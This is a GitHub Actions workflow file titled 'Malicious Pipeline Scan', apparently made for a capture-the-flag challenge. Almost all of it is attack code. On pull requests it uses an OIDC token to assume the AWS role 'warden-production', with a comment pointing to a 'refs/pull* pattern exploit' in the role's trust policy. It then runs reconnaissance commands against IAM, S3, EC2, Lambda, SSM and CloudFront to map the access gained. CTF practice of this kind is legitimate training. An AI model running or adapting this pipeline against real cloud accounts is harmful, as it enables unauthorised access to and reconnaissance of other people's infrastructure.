name: Malicious Pipeline Scan
on:
  pull_request:  # Required for refs/pull* pattern exploit
    branches: 
      - main

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    
    steps:
    - name: Checkout
      uses: actions/checkout@v4
      
    - name: Exploit AWS Role
      uses: aws-actions/configure-aws-credentials@v4
      with:
        aws-region: us-east-1
        role-to-assume: arn:aws:iam::${{ secrets.AWS_ACCOUNT_ID }}:role/warden-production
        
    - name: Hunt for Flags
      run: |
        echo "=== AWS Identity ==="
        aws sts get-caller-identity
        
        # Try basic operations to see what's allowed
        aws iam get-role --role-name warden-production 2>&1 || echo "Can't read own role"
        aws iam list-attached-role-policies --role-name warden-production 2>&1 || echo "Can't list policies"

        aws cloudfront list-distributions 2>&1 | head -10
        # Test different AWS services
        aws s3 ls 2>&1 | head -5
        aws ec2 describe-instances --max-items 1 2>&1 | head -5  
        aws lambda list-functions --max-items 1 2>&1 | head -5
        aws ssm describe-parameters --max-results 1 2>&1 | head -5

